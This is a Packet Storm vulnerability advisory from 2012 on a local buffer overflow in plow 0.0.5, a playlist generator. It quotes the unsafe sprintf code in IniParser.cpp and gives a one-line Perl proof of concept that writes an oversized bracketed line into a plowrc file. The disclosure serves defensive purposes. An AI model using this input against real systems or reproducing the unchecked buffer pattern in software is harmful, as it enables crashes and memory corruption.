Plow 0.0.5 Buffer Overflow

2012-07-04T00:00:00
ID PACKETSTORM:114472
Type packetstorm
Reporter Jean Pascal Pereira
Modified 2012-07-04T00:00:00

Description

                                        
                                            `#################################################  
plow 0.0.5 <= Buffer Overflow Vulnerability  
#################################################  
  
Discovered by: Jean Pascal Pereira <pereira@secbiz.de>  
  
Vendor information:  
  
"plow is a command line playlist generator."  
  
Vendor URI: http://developer.berlios.de/projects/plow/  
  
#################################################  
  
Risk-level: Medium  
  
The application is prone to a local buffer overflow vulnerability.  
  
-------------------------------------  
  
IniParser.cpp, line 26:  
  
26: char buffer[length];  
27: char group [length];  
28:  
29: char *option;  
30: char *value;  
31:  
32: while(ini.getline(buffer, length)) {  
33: if(!strlen(buffer) || buffer[0] == '#') {  
34: continue;  
35: }  
36: if(buffer[0] == '[') {  
37: if(buffer[strlen(buffer) - 1] == ']') {  
38: sprintf(group, "%s", buffer);  
39: } else {  
40: err = 1;  
41: break;  
42: }  
43: }   
  
-------------------------------------  
  
Exploit / Proof Of Concept:  
  
Create a crafted plowrc file:  
  
perl -e '$x="A"x1096;print("[".$x."]\nA=B")'>plowrc  
  
-------------------------------------  
  
Solution:  
  
Do some input validation.   
  
-------------------------------------  
  
#################################################   
`